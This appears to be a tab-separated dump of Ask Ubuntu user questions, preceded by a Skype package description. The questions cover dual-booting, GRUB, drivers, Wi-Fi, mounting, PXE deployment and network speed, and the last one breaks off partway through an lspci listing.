installed version : 4.2.0.11-0ubuntu0.12.04.2 priority : extra section : net maintainer : steve langasek < steve.langasek @ canonical.com > architecture : amd64 uncompressed size : 62.5 k depends : skype-bin conflicts : skype description : client for skype voip and instant messaging service skype is software that enables the world 's conversations . millions of individuals and businesses use skype to make free video and voice calls , send instant messages and share files with other skype users . every day , people also use skype to make low-cost calls to landlines and mobiles . * make free skype-to-skype calls to anyone else , anywhere in the world . * call to landlines and mobiles at great rates . * group chat with up to 200 people or conference call with up to 25 others . * free to download .
328488	how to change device icons in launcher ?	i 'm running ubuntu 13.04 and i have several hard drives in my computer and all appear with the same icon in the launcher . is it possible to modify their icons one by one or at least change their color to better find what i 'm looking for ?
328489	heating fan and weaker battery in lubuntu 13.04	since i switched from ubuntu to lubuntu ( both 13.04 ) i spotted some differences : battery life is about 30 % shorter . at first i thought that the indicator shows wrong values , so i decided not to charge it till it dies , but it turned off right away ! the fan is heating constantly for no obvious reason . for instance , cpu is less than 10 % ( kib mem : 6017268 total , 2138152 used , 3879116 free , 118712 buffers ) there is a huge delay before password prompt appears after `` apt-get '' - type command how do i fix these issues ? of course , those are only the negative ones , lubuntu works slightly faster and has less default apps .
328492	remote terminal win8 ca n't access dvd in 12.04 computer when its monitor and kbd are removed	want to run 12.04 computer as a server with no kbd or monitor . but if i remove them the dvd shows up in the remote terminal but i cant access it . it works with the monitor and kbd installed on the server but not with them disconnected . put the mount command line in fstab to mount it to media/cdrom still no go . 12.04 installed on one drive / swap and home partitions . any ideas would be appreciated .
328498	after umount -f -a pc not recognize hdd	i executed umount -a -f / to unmount all devices.after restarting system i can not see ubuntu choice of grub2 , i mean grub2 does not come.i aenter code herem alone with the bios of dell inspiron 15r . how can i make pc recognize grub2 menu .
328500	how do i install ebook reader ? problems with fbreader	i try to install fbreader via ununtu software center , but it stalls for a long time and even after the process is supposedly complete , ubuntu does n't display epub and mobi files when i click them . it says `` there is no application installed for âmobipocket e-bookâ files . do you want to search for an application to open this file ? '' and this process does n't finish . what should i do ? alternatively , i need something to display epub/mobi files . my internet connection is ok ; e.g . i am able to install system via ubuntu netinstall without a problem .
328501	how can i make ubuntu only boot from ssd ?	i have two drives and i want it so that the ssd drive is only for ubuntu boot . nothing saved on it , not even system files just have it boot from ssd and i have a hdd to put storage and any other stuff . how would i go about doing that ?
328508	enabling wireless in ubuntu 12.04	i have a sony vaio laptop and recently installed ubuntu 12.04 along with win 7 , dual boot ! i have wifi which works on windows but on ubuntu , my wireless is disconnected . i typed `` rfkill list `` on the terminal to check the reason for the problem and it shows me that my `` acer-wireless : wireless lan '' is soft blocked and its not hard blocked . i tried clicking on the enable wireless option on the top left of the screen after logging into ubuntu 12.04 but it is not getting enabled . please help , as i need to download eclipse for programming in college .
328509	eclipse problem in ubuntu 12.04	i recently installed eclipse but its not starting when i enter command `` eclipse '' on terminal . i am pasting a log , kindly review it and suggest solution to fix the problem http : //pastebin.com/embed_js.php ? i=kg8uvpee
328517	ca n't change back screen resolution	i used the sudo service lightdm stop to install a driver , ( it was unsuccessfull , but it does n't mather ) , then a rebooted , and since than , i 'm unabel to chamnge the resolution of my laptop . i 've tried so many ways , but all of them were seless . thanks a lot dani
328519	why teamviewer keeps running in the background ?	after i installed teamviewer 8 on ubuntu 12.10 , i noticed a running process under the name of 'teamviewerd ' , more specifically : /opt/teamviewer8/tv_bin/teamviewerd -f /opt/teamviewer8/tv_bin/wine/bin/wineserver and it auto-reopens whenever i try to kill it and i wonder why this happens . thanks in advance .
328520	about nemo file manager : how can i change font color of folder name in toolbar button ?	about nemo file manager : how can i change font color of folder name in toolbar button ? because i deeply prefer ambiance theme , so i want to keep it but it mess up with the theme of nemo which is my favourite file manager as shown in attached picture . how can i specifically tweak just folder name font 's color of nemo ? is there a way without recompiling the whole app ?
328526	bash : permission denied ubuntu 12.04 lts	i used this command to start x11vnc at startup , this command is from here . and here is the command : echo `` /usr/bin/x11vnc -forever -rfbport 5900 -rfbauth ~/.vnc/x11vnc.pass -o ~/.vnc/x11vnc.log -loopbg -display :0 '' > ~/.config/autostart/x11vnc.sh chmod +x ~/.config/autostart/x11vnc.sh but when i press enter , i got this permission denied message '' bash : /home/user/.config/autostartx/x11vnc.sh permission denied '' i hope someone can help me . thnx
328528	ubuntu 13.04 unity desktop not displaying once expanded across multiple displays and terminal is not working	it took a while for me to even find out how to spread my desktop across all 4 of my displays . i also managed to activate the ability to drag windows between desktops as well . now only my login screen shows up the way i want it and after logging in my desktop is black on all 4 monitors and i have no access to the terminal , there is n't any kind of icon anywhere . from what i could tell i have no way to access any logs either even if i knew how .
328529	how to download gta iv in ubuntu ?	will you please tell me how to download and install gta iv in ubuntu ?
328539	restore files that where moved to trash	i accidentally moved files in folder1 to trash . but i am not sure which files where in this folder so i can not restore them one by one . does ubuntu still know that this files where placed in folder1 ? can i restore those files back into the folder ?
328540	how to install python 2.5.4 in ubuntu 11.10 ?	i 've been reading through some posts on how to install python 2.5.4 in ubuntu but i can not manage to find a solution to my problem . the version of ubuntu i have is the 11.10 and the one of python i intend to install is 2.5.4 . it must be that one and not any of the updates since i am following a course which uses specifically 2.5.4 . i have already tried executing in the terminal commands proposed in other posts but i always get a mistake . i 'd be really thankful i some could explain detailed and concisely how i can do it . as said , thank you in advance , dionisio .
328543	drawing over the desktop	i am wondering if there is anything similar to ink over apps for linux . i.e . , a program that allows me to draw over any other program given xs architecture , it should be possible , but i looked for it and could not find it . edit : i have two good suggestions by roman raguet : one in his answer , and one in the comments . i 'd like more suggestions , and , if possible , one that does not require a composite window manager
328551	ubuntu 12.04 lts - black screen at boot after changing nvidia driver	2 days ego i updated my ubuntu 12.04 lts to latest updates but i ignored grub updating because i thought it will clear my grub settings ( i 'm so noob ! ) . after restart every things was right , the ubuntu started normally and every things was working well except graphic which had problem before update . i had the experimental driver before but i changed it to the current-update version . after restart ubuntu stock on black screen . i tried to reinstall nvidia driver from recovery but it not worked . then i used update grub in recovery , it not worked too but i see this line on screen at boot : at this time it stops and keyboard not working , but when i push the power button it shows these lines and it will shutdown . ok finally i made it start with older kernel ( 3.5.0-28-generic ) . now how can i keep this kernel or fix ubuntu to work with new kernel ? should i reinstall nvidia driver ? which version should i use ?
328557	chrubuntu 12.04 lts stopped working need help ?	i installed a new kernel version for ubuntu and rebooted it stopped working , and then i tried going to chrome os and back to ubuntu and it just gives me a full screen command prompt that just allows me to type , as far as i know the kernel may be corrupt and i need help getting it back , please been battling it for like a day now , what can i do to fix the corrupt kernel ?
328563	is data recovery possible in ubuntu 13.04	i am currently using ubuntu 13.04 along with windows xp sp3 . but couples of days before ubuntu has crashed . whenever i start the pc the dualboot window appears when i select ubuntu a blackscreen appears with a command mode . starting with ( initramfs ) and ca n't mount my ubuntu.please suggest me a data recovery method .
328564	how to put hard block on bluetooth and wifi ?	i have an asus laptop with atheros ar9285 wireless network adapter . i 've installed ubuntu 13.04 . i tried sudo rfkill block all and the output of rfkill list all is 0 : phy0 : wireless lan soft blocked : yes hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : yes hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : yes hard blocked : no is there any way to put hard block on both wifi and bluetooth ? any help would be appreciated .
328566	ubuntu is installed in uefi mode even after selecting legacy mode in bios	i installed ubuntu on my dell inspiron 14z , currently only in my hdd . before installing that , i switched to ahci , turned off intel rapid storage technology , turned off secure boot . then while making the new partition table i choose gpt , and installed ubuntu . but when i restarted the system , it was showing an error message as `` no operating system found '' . in boot options ubuntu was showing beneath the `` uefi '' tab . even after running boot-repair , it prompted that my os is installed in efi mode . but i am unable to understand how is that possible , when i installed it in legacy mode . edit : boot repair url is http : //paste.ubuntu.com/5954568/
328568	ca n't mount my /home drive ( /dev/sdb6 )	i have hdd for ubuntu 13.04 with this structure : ( ext4 ) - /dev/sdb2 mounted at `` filesystem root '' a.k.a `` / '' ( ext4 ) - /dev/sdb6 as `` /home '' ( ca n't mount it ) ( swap v2 ) - /dev/sdb5 as `` linux swap '' the owner of `` /dev/sdb2 '' ( `` / '' ) is `` root '' . the owner of `` /dev/sdb6 '' ( /home drive ) is me . i wanted to create folders with my files outside the `` home '' folder in this drive and so i took the rights . now if i try to boot ubuntu , at start i got something like `` ubuntu can not mount drive /home . press `` s '' to skip or `` m '' for manual recovery . '' manual recovery leads me to root terminal , but i do n't know exactly how to fix this . `` # mount /dev/sdb6 '' or `` # mount /home '' do n't work . if i press skip , it leads me to user login panel . and there is the funny part . i ca n't login my user account . i know my password , but it just does not work . i even tried to change the password from the root terminal ( recovery console ) with `` passwd '' successfully and still do n't work . so atm i can login only as guest . and here i have very limited rights . i can use the root recovery console mentioned above , but its up to you to tell me what commands to use there . if i try to mount `` /home '' ( /dev/sdb6 ) from the guest account , using the `` disks '' utility , first asks me for the password to my account and then i get this : error mounting system-managed device /dev/sdb6 : command-line `mount `` /home '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdb6 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ( udisks-error-quark , 0 ) thanks for the help . edit if i try to use the root recovery console and type `` # mount /home '' i get this : feedback : for `` namingfailed '' the official owner was `` root '' . when i installed ubuntu 13.04 , i set the `` /dev/sdb2 '' as `` / '' and `` /dev/sdb6 '' as `` /home '' . i had some hesitation about the size of every partition and that 's why i have missing numbers like `` sbd1 , sbd3 and sbd4 '' . anyway those partitions are complitly gone . ubuntu 13.04 was installed only with 3 drives ( sdb2 , sdb5 and sdb6 ) as `` fstab '' shows.. # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdc2 during installation # /home was on /dev/sdc6 during installation # swap was on /dev/sdc5 during installation uuid=29d5e133-70ed-43ed-a61f-cfcf9adaa510 none swap sw 0 0 /dev/disk/by-uuid/36125efb125ebf93 /mnt/36125efb125ebf93 auto nosuid , nodev , nofail , noauto 0 0 /dev/disk/by-uuid/01cc4ceebe6f62c0 /mnt/01cc4ceebe6f62c0 auto nosuid , nodev , nofail , noauto 0 0 /dev/disk/by-uuid/01cc4cc16b0ee880 /mnt/01cc4cc16b0ee880 auto nosuid , nodev , nofail , noauto 0 0 uuid=cfc08790-4674-4eec-ab23-a112e8f97478 /home ext4 defaults , x-gvfs-show 0 2 uuid=096b6f57-28af-4f20-aec8-8a5411814614 / ext4 errors=remount-ro 0 1 /dev/disk/by-uuid/01cc4ceee36cfd80 /mnt/01cc4ceee36cfd80 auto nosuid , nodev , nofail , x-gvfs-show 0 0 for `` mikewhatever '' # sudo chown -r fearbg : fearbg /home # sudo chmod -r 755 /home after that i was able to make new folders outside the `` fearbg '' home folder .
328569	how to setup apache2 properly	how do i set up my server so it is visible from the outside ? i have set up port forwarding ( port 80 ) to my server . i have also set up a static ip for the server . i think the cause is the server ( apache2 on ubuntu server 13.04 ) says that it ca n't reliably determine the fqdn . here is the result of hoastname : elliot-web here is the result of hostname -f : hostname : name or service not known here is the hosts file contents : 127.0.0.1 localhost 127.0.1.1 elliot-web.elliot-labs.com # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters and if you are wondering i have set up my domain to point to my wan ip ( from godaddy ) .
328570	how to install the latest versions of lamp componanents	i want to develop web applications with php , for that reason i need to install a lamp system , i heard that it 's good idea to use latest versions of php , mysql and apache ... so if it 's possible please help me ...
328577	will i be able to use win 8 drivers ?	will i be able to use windows 8 drivers on this os or will i need to find different one to make stuff such as my killer wireless card and display work ? i have a killer wireless 1202 with bluetooth and i really need to know if this will work or not plus i need to know if i will be able to use google drive or skydive
328586	laptop fan operates for a long time	my laptop dell inspiron 15r 3521 heats a lot when i installed ubuntu along with windows 7 . how to avoid this ? ? ? ( i checked all the drivers but they are all propriety drivers . i have a shared vga . 4gb ram ... thank you
328588	ubuntu installation on medion® akoya® pc e2021 e : possible ?	i could n't find the medion® akoya® pc e2021 e desktop in the ubuntu desktop certified hardware list . will ubuntu work without troubles on a medion® akoya® pc e2021 e desktop ? many thanks . best regards matthias
328595	how to install windows 8 along side of ubuntu 13.04 ?	i brought new dell laptop which is pre-installed of 12.04 , i upgraded it to 13.04 . i need some work which will be only available in windows os . so i plan to install windows os in my laptop as a second os ( dual os system ) . please tell me it is possible to install windows 8 on ubuntu 13.04 ? i searched a lot on google but the question are mostly ubuntu alongside windows are asked often . now i partitioned my disk for windows ( ntfs ) . i removed the linux swap due to create ntfs partition , ( gparted allow more than 4 partition ) . additionally i want to know the partitioned details is first drive is dell utility , second one is os , third one is linux data partition and fourth one is ntfs for windows ( not yet installed just allocated the space for it ) . after finding my gui view of gparted window please suggest to step by step instruction to install windows 8 on ubuntu . please check the image on this link http : //s16.postimg.org/3kw0tvzfp/gparted.png
328597	how does ubuntu one work ? files seem to upload but can not be accessed on another system	i have two computers running 12.04 , i sign into my ubuntu 0ne account on each computer , `` hi jqpublic '' both say . do i understand correctly that placing a file ( specifically an .ogg music file ... simply a song ) into the `` ubuntu one '' file folder ( always synced ) on one computer , i should be able to open the `` ubuntu one '' file folder on the other computer and find said .ogg , right ? that is how this is meant to work , yes ? because it 's not what 's happening . nothing uploads ( though the first computer claims such ) . minutes pass , still nothing . a different experiment : i uploaded a file folder containing a song ; the folder was available on both computers , but remained decidedly empty . any suggestions ? i 'm otherwise loving my return to ubuntu ( left at 9.04 ) . i really am inclined to think that i 'm missing something huge , that this is all a user ( me ) error , not a bug ... is it me ? all help appreciated . peace , jqpublic
328603	kdenlive website go	i know this is the stupidest question ever but where is kdenlive website ? ? i was am looking for it on google but can not find it anywhere is that project still active ? ?
328616	can not get dwa-142 to work on 13.04	i need help installing a dlink dwa-142 wireless usb adapter in ubuntu 13.04 . i already installed ndiswrapper and tried both netmw245.inf and mrvw245.inf drivers . result of ndiswrapper -l ( respectively ) : netmw245 : driver installed device ( 07d1:3b10 ) present mrvw245 : driver installed device ( 07d1:3b10 ) present result of lsusb : bus 001 device 003 : id 07d1:3b10 d-link system dwa-142 rangebooster n adapter [ marvell 88w8362+88w8060 ] bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub result of iwconfig : eth0 no wireless extensions . lo no wireless extensions . still no wlan0 . what can i be doing wrong ?
328617	compiling blt2.4 on 64bit ubuntu machine	i 'm new to programming/linux and trying to install blt2.4 , which is needed for another program that will be installed later . first , i successfully installed tcl8.3 tk8.3 and their dev counterparts on my 64-bit ubuntu machine . i then tried configuring blt2.4y with the command : ./configure -- with-tcl=/usr/lib/tcl8.3 -- with-tk=/usr/lib/tk8.3 and get several messages like this when i make : /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux gnu/4.7/../../../../lib/libtk8.3.so when searching for -ltk8.3 /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.7/../../../libtk8.3.a when searching for -ltk8.3 /usr/bin/ld : skipping incompatible /usr/lib/libtk8.3.so when searching for -ltk8.3 /usr/bin/ld : skipping incompatible /usr/lib/libtk8.3.a when searching for -ltk8.3 /usr/bin/ld : can not find -ltk8.3 i get the same kind of messages for ltcl8.3 . after hours of searching and trying different fixes ( using symlinks , installing multilib , etc . ) , i 've had no success . it might have something to do with the makefile , which is generated automatically from makefile.in after configure . i 've tried suggestions like `` cflags=-m32 '' makefile changes but no dice . this is my makefile right after configure : cc = gcc cflags = -o6 extra_cflags = -wall -fpic defines = def_bltinit = -dblt_library=\ '' $ ( scriptdir ) \ '' shlib_ld_flags = -rdynamic shlib_ld_libs = -ltk8.3 -ltcl8.3 -lx11 -lm -lnsl shlib_ld = cc -pipe -shared ldflags = prefix = /usr exec_prefix = /usr libdir = $ ( exec_prefix ) /lib bindir = $ ( exec_prefix ) /bin srcdir = ./.. instdirs = $ ( exec_prefix ) $ ( libdir ) scriptdir = /usr/lib/blt2.4 libs = -ltk8.3 -ltcl8.3 -lx11 -lm -lnsl tcl_only_libs = -ltcl8.3 -lm -lnsl what changes ( if any ) should i make to the makefile/makefile.in , linking , etc so this will compile ? just wanted to mention again that i am generally new to linux/programming in general . any suggestions to resolve this is greatly appreciated .
328618	how to remove duplicated directory ?	i have two directory with same name of `` unread '' . ls -l drwx -- -- -- 1 vg vg 200 aug 4 21:57 unread drwx -- -- -- 1 vg vg 200 aug 4 21:57 unread when i rm/mv the directory named `` unread '' , one is affected and the other gets this attributes : rm -r unread ls -l d ? ? ? ? ? ? ? ? ? ? ? ? ? ? unread any help would be greatly appreciated .
328621	asus ul80vt hybrid graphics - how to disable the intel gpu ?	i 'm running ubuntu 13.04 . i have an asus ul80vt . there is an integrated intel gpu and an nvidia geforce g210m . i want to disable the intel gpu and just use the nvidia . i have found one helpful source at this . but this method involves the directory at /sys/kernel/debug/vgaswitcheroo/switch . i do not have this directory and i have looked as root and checked hidden files , vgaswitcheroo is n't present in /sys/kernel/debug . i 'm not really sure where to go from here .
328629	how do i install the proprietary drivers for 650 ti boost	i just installed ubuntu on my newly built computer and wanted to use the proprietary drivers for my 650 ti boost . when i open the addtional drivers program it searches for available drivers but nothing shows up . i want to use the proprietary drivers because i had poor performance in minecraft and team fortress 2 crashes to desktop
328632	package manager has an error and no longer runs	when i type sudo apt-get upgrade in a terminal i get this output : reading package lists ... error ! e : unable to parse package file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-updates_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . how do i fix this ? i am running ubuntu 13.04 on a toshiba l855 laptop .
328639	compiling audacity 2.0.3	starting from a download of audacity 2.0.3 tarball , how do i go through the installation procedure . i have no experience of this procedure .
328644	why does ubuntu 12.04 lts look horrible in virtual machine	i downloaded via virtual box ubuntu 12.04 lts . i 've never used ubuntu before but wanted to give it a shot . my host is an hp 2000 notebook pc , intel r core i3-3110m cpu . graphis say vesa : oracal vm virtualbox vbe aadapter i am booting from the hard disk on the virtual machine but the graphics look horrible . everything is so big , the icons..and it does n't even look clear ... like a bit blurry . any assistance would be greatly appreciated . again , i a new to using ubuntu so any help explained at like the kindergarten level would be helpful . thanks !
328649	how can i share my nfs share by name	how can i setup nfs to share from a host that is identified by name rather than ip address ? i have used the community documentation to setup the nfs share . the issue is that i am sharing it over my local network , and whenever the router is reset all of the clients must be reconfigured .
328655	trying to triple boot snow leopard , windows 7 and ubuntu 13.04 on my mbp 7,1 !	i 've been trying ( unsuccessfully ) to triple boot snow leopard , windows 7 , and ubuntu 13.04 with little to no avail . i used a dvd i 've burned to install ubuntu and a genuine windows 7 cd . i 've followed a few guides i found on google ( such as this one ) , amongst others , and everytime i either install windows or ubuntu , my macbook freezes at a certain point during installation ( for windows ) or something goes wrong with ubuntu . this is my 2nd or 3rd time i 've had to completely reformat my computer , so it has cost me a lot of time and frustration . anyways , could anyone enlighten me with some advice or help ?
328658	windows server 2008 , wds + ubuntu images	i need to deploy ubuntu current release 12.4 through server 2008 r2 's wds . i am following the guide available at : http : //thommck.wordpress.com/2011/06/16/installing-linux-via-pxe-using-windows-deployment-services-wds/ step one – install wds this should be obvious and if you are reading this i imagine you’ve done it already . ours is running on a windows server 2003 box but it should work fine with the latest , more secure , stuff . we will be adding bits to the folders within the \\wds\reminst share step two – install pxelinux pxelinux is part of the syslinux package download syslinux from here there’s quite a bit in syslinux but you only need to extract the following files zip\core\pxelinux.0 zip\com32\menu\vesamenu.c32 zip\com32\modules\chain.c32 copy the files into \\wds\reminst\boot\x86 rename pxelinux.0 to pxelinux.com you also need to make copies of two original wds files in this folder copy pxeboot.n12 and rename it to pxeboot.0 copy abortpxe.com and rename it to abortpxe.0 create to new subfolders \\wds\reminst\boot\x86\linux \\wds\reminst\boot\x86\pxelinux.cfg the pxelinux.cfgfolder is where you store the files that make up the pxe boot ( f12 ) menu . all the files we will put in there are text files , even though they don’t use a .txt extension first create a new text file called default . this is the first menu that loads . paste the following text into it 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 default vesamenu.c32 prompt 0 menu title pxe boot menu ( x86 ) menu include pxelinux.cfg/graphics.conf menu autoboot starting local system in 8 seconds # option 1 - exit pxe linux & boot normally label bootlocal menu label ^boot normally menu default localboot 0 timeout 80 totaltimeout 9000 # option 2 - run wds label wds menu label ^windows deployment services kernel pxeboot.0 # option 3 - exit pxe linux label abort menu label e^xit kernel abortpxe.0 now create a text file called graphics.conf this file controls how the menu is displayed . it’s very versatile so have a play around until it looks as basic or as flashy as you like paste the following text into it 01 02 03 04 05 06 07 08 09 10 11 menu margin 10 menu rows 16 menu tabmsgrow 21 menu timeoutrow 26 menu color border 30 ; 44 # 00000000 # 00000000 none menu color scrollbar 30 ; 44 # 00000000 # 00000000 none menu color title 0 # 00269b # 00000000 none menu color sel 30 ; 47 # 40000000 # 20ffffff menu background background.jpg noescape 0 allowoptions 0 if you want to use a custom background , place it in the \\wds\reminst\boot\x86folder . the image should be a 640×480 jpeg file . make sure it has the same name as specified in the menu background line in graphics.conf now we need to change the default boot program in wds open the windows deployment services console right click on your server and select properties from the boot tab change the default boot program for x86 architecture to \boot\x86\pxelinux.com in server 2008 r2 you have to use the wdsutil command line to set the the default boot program with these commands 1 2 wdsutil /set-server /bootprogram : boot\x86\pxelinux.com /architecture : x86 wdsutil /set-server /n12bootprogram : boot\x86\pxelinux.com /architecture : x86 step three – test it out before you go any further , do a test pxe boot to check everything is ok . i use a hyper-v vm to make this testing process quicker . just make sure it’s set to boot to a legacy network adapter in the settings wds-pxe-menu if it doesn’t load make sure you have the following files and folders in the right place within the \wds\reminst share \boot\x86\pxelinux.com \boot\x86\vesamenu.c32 \boot\x86\chain.c32 \boot\x86\pxeboot.0 \boot\x86\abortpxe.0 \boot\x86\background.jpg \boot\x86\linux\ \boot\x86\pxelinux.cfg\ \boot\x86\pxelinux.cfg\default \boot\x86\pxelinux.cfg\graphics.conf i am done uptil here , i tested and got the ubuntu menu option during pxe boot . but i am fully lost how the installation will be kick off ? is it only limited to cd install , or i can deploy the custom image as well . in both cases i need assistance how to do this . i aobtained the netboot files for the ubuntu 32bit edition , got the initrd.gz and linux files . in the default file under the remoteinstall folder ( x86 and x64 ) , i have the correct entry as : append priority=low vga=normal initrd=/linux/ubuntu/initrd.gz ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. when i pxe boot it , it displays the menu , how to host the operating system so pxe request can be facilitated .
328668	ca n't boot ubuntu 13.04 after installing alongside windows 8	i 've tried running boot-repair a few times with diffrent settings , to no avail . paste.ubuntu.com/5948482 paste.ubuntu.com/5948580 paste.ubuntu.com/5948657 when an option does appear in the bios to boot from 'hard drive ' , i get a line of random ascii characters i 've also tried using easybcd , but that give an error too . i have an asrock z77 extreme 4 motherboard . thanks .
328672	need help dual booting ubuntu 13.04 and windows 7 ( ubuntu installed )	i recently replaced windows 7 pro with ubuntu 13.04 . i did not partition the drives to install windows on , because i do not know how . i did the full installation of ubuntu , meaning i did not install alongside windows . i still have my windows 7 pro dis . any help is appreciated ! thanks .
328673	need help fixing grub after installing ubuntu 13.04 x64 alongside windows 8 on a lenovo ideapad y400 with uefi	i have a lenovo ideapad y400 that came pre-installed with windows 8 . i would like to run ubuntu alongside it in a dual-boot configuration . i 've spent the past week fiddling around , re-installing both windows and linux in various configurations , and i 've come awfully close to success , but seem to have hit a snag with grub . for my most recent attempt , i took the following steps : disabled secure boot re-imaged windows 8 from a hidden recovery partition , effectively restoring the machine to factory state activated an option called legacy support in the bios ( or is it uefi now ? ) booted ubuntu 13.04 x64 from a usb stick , chose `` install alongside windows '' and accepted all default options after a restart , found that i could boot ubuntu , but could not boot windows once into ubuntu , i ran boot repair with recommended settings and accepted all defaults . when boot repair finished , i was presented with the following message : the boot files of [ the os now in use - ubuntu 13.04 ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu.com/community/bootpartition ) i followed the instructions at the url in the message , creating a 1gb ext 4 partition near the start of the drive when i tried to run boot repair again , the `` separate /boot partition '' option on the `` grub location '' tab was disabled . the new partition is /dev/sda11 and has the label grub . on restart , i get the following error message : error : file '/boot/grub/i386-pc/normal.mod ' not found . grub rescue > however , if i manually choose the boot partition by hitting f12 , i can boot into windows no problems . selecting ubuntu from the boot device menu gives me a grub menu with the following options : ubuntu advanced options for ubuntu windows uefi recovery bootmgfw.efi windows boot uefi recovery windows uefi recovery lrsbootmgr.efi windows boot uefi recovery bkpbootx64.efi windows recovery environment ( loader ) ( on /dev/sda3 ) windows 8 ( loader ) ( on /dev/sda5 ) system setup selecting ubuntu from this menu allows me to get to my ubuntu desktop . i have n't tried the other options yet for fear of losing the progress that i 've made . so it looks like i have successfully dual-booted the machine , but that grub is broken for some reason or another . my current partition scheme can be seen at : http : //paste.ubuntu.com/5948753/ thanks in advance - jonathan
328674	how to dual boot ubuntu and linux mint	ok so i have ubuntu 13.04 and today i installed linux mint 15 alongside ubuntu by partitioning the hard drive in the setup . but now when i start my computer , it automatically boots to ubuntu with no options .
328678	extremely slow network transfers in one direction	file transfers from my home server ( running ubuntu 12.04 server ) to any other pc on my lan ( all running windows 7 ) are extremely slow , but file transfers in the other direction ( uploading to the server ) are fast . i observed this with both samba and sftp transfers , so decided to verify it with iperf , and got the same results . the output on the server looked like this : iperf -s -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- server listening on tcp port 5001 tcp window size : 85.3 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.1.95 port 5001 connected with 192.168.1.82 port 1309 [ id ] interval transfer bandwidth [ 4 ] 0.0-10.0 sec 416 mbytes 349 mbits/sec -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- client connecting to 192.168.1.82 , tcp port 5001 tcp window size : 46.1 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.1.95 port 59704 connected with 192.168.1.82 port 5001 [ 4 ] 0.0-12.2 sec 1.50 mbytes 1.03 mbits/sec the client ( my win 7 pc ) produced this output for the same run : iperf.exe -c 192.168.1.95 -r -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- server listening on tcp port 5001 tcp window size : 64.0 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- client connecting to 192.168.1.95 , tcp port 5001 tcp window size : 64.0 kbyte ( default ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ 4 ] local 192.168.1.82 port 1309 connected with 192.168.1.95 port 5001 [ id ] interval transfer bandwidth [ 4 ] 0.0-10.0 sec 416 mbytes 349 mbits/sec [ 4 ] local 192.168.1.82 port 5001 connected with 192.168.1.95 port 59704 [ 4 ] 0.0-12.2 sec 1.50 mbytes 1.03 mbits/sec similar results are observed from other clients . the computers are all connected to the same gigabit wired switch . exchanging the ports and cables between them gives the same result . running the transfers to and from a ramdisk set up on the server does n't alter the transfer speeds , either ; i do n't believe the hard disk is causing the problem . i 've done my best to google around similar problems , but i have n't found any relevant solutions yet . does anyone have any ideas ? the following are some dumps of relevant debug commands , in case they 're of any use to people more knowledgeable than me . ethtool output for the ethernet card on the server : ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full link partner advertised pause frame use : symmetric receive-only link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes mii-tool output : sudo mii-tool eth0 : negotiated 1000baset-hd flow-control , link ok list of hardware returned by lspci : sudo lspci 00:00.0 host bridge : via technologies , inc. cn700/vn800/p4m800ce/pro host bridge 00:00.1 host bridge : via technologies , inc. cn700/vn800/p4m800ce/pro host bridge 00:00.2 host bridge : via technologies , inc. cn700/vn800/p4m800ce/pro host bridge 00:00.3 host bridge : via technologies , inc. pt890 host bridge 00:00.4 host bridge : via technologies , inc. cn700/vn800/p4m800ce/pro host bridge 00:00.7 host bridge : via technologies , inc. cn700/vn800/p4m800ce/pro host bridge 00:01.0 pci bridge : via technologies , inc. vt8237/vx700 pci bridge 00:08.0 network controller : broadcom corporation bcm4306 